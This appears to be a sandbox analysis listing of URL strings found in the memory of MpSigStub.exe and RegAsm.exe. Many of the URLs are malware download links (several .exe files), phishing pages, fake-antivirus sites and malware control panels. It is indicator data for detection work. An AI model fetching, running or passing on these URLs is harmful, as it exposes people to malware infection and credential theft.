Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://91.108.68.202/up.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://91.142.64.91/quantserve/quant.js
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://91.188.117.157/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://91.188.124.171/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://91.196.216.64/s.php?ref=
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://91.227.18.58/sqwere/casma.gif
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://91.238.134.77/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://91.239.15.61/google.js
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/blowjob.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.48/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.48/g
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.48/m/tm.exe%temp%
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://9nag0.com/unbbmevd/d76.php?l=oev2.cab
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: http://Andrei512.narod.ru
Source: RegAsm.exe, 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp String found in binary or memory: http://JgQKqy.com
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Viewpics.DYNU.com/views.php?dir=pics&section=hot&clip=14
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Yyl.mofish.cn/interFace/ActiveSeed.aspx
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Yyl.mofish.cn/interface/SeedInstall.aspx
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Yyl.mofish.cn/wevoo/data.dat
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Yyl.mofish.cn/wevoo/data/data
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://Yyl.mofish.cn/wevoo/lists/200
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.co
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://aa.llsging.com/ww/new05.htm?075width=1name=
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://abidjanlit.com/loyiruef/invoice/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://abitando.net/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://acacia19.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://accordlifespec.com/gtt.exe
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://acglgoa.com/faq.htmwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://adf.ly
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://adoffy.alltuckedinathome.com:8080/led.js
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://adsgo.zh-cn.cc/?
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://adult-analsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://adult-fetishismsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://advadmin.biz/tasks
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18350803213.0000015B1B766000.00000004.00000001.sdmp String found in binary or memory: http://adwpro.avelite.hop.clickbank.net/?mode=p
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://agentwarderprotector.info/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://ago2.co.kr/bbs/data/dir/note.png
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://aklick.info/d.php?date=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://aksoni.myjino.ru/pn-g/xls.html)
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://al-tasmem.ga/doc/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://allinfree.net.info/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://allinfree.net/chrome.xml
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://alrozaviation.com/oj
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://americanexpress-secure.com
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://amiral.ga/wp-content/cUFTze5/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.tech/
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.win/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://animator.fetishismadultmovegal.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://anxw.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/xM
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://api.media-tractor.com/track/?data=301
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://api.mswordexploit.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://app.whenu.com/Offers
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://appstub.blogspot.com/
